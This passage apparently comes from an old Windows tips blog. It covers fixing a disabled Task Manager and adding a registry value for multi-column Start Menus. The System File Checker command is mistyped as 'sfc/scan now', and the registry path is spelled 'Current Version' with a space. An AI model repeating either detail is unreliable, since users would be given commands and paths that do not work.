If the Task Manager is still not Fixed Yet then try these Tricks.

1) As Malware or other kinds of Virus may prevent Task Manager from Opening so try a Deep Malware and Virus Scan.This may help you. For this you can use the Product by Microsoft i.e. Microsoft Security Essential.

2) Run System File Checker by typing sfc/scan now in Command Prompt and pressing Enter.

If still now the Problem is not Fixed then We recommend that you ReInstall Windows. As this Problem can cause further Errors and Damages to your Computer. Or For more help you can Contact Us.

So these are simple Tricks on How to Fix Task Manager Disabled by Administrator in Windows.

Sunday, 3 June 2012

Trick to add Multiple Columns in Start Menu

Start Menu is known to be the Gate Way of the Windows.
This Start Menu is used by many of Computer user to Navigate to any of their Work.
But in this Start Menu there are only limited Columns which are not able to show all of the useful Tasks we need when we use our Computer.

So now here is the Trick to add Multiple Columns in Start Menu.

To use this Trick just follow these simple steps :

1) Click Start  >>  Run  >>  Regedit  >>  press Enter to Open Registry Editor.

2) Now navigate to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\Advanced.

3) Now Create a String value named as "StartMenuScrollPrograms" ( without quotes ) by Right Clicking in the Right Pane of the window. Now set the value to "FALSE".

4) Now it is done. The Start Menu of the Windows has Multiple Collumns from now.

So it is simple Trick to add Multiple Columns in Start Menu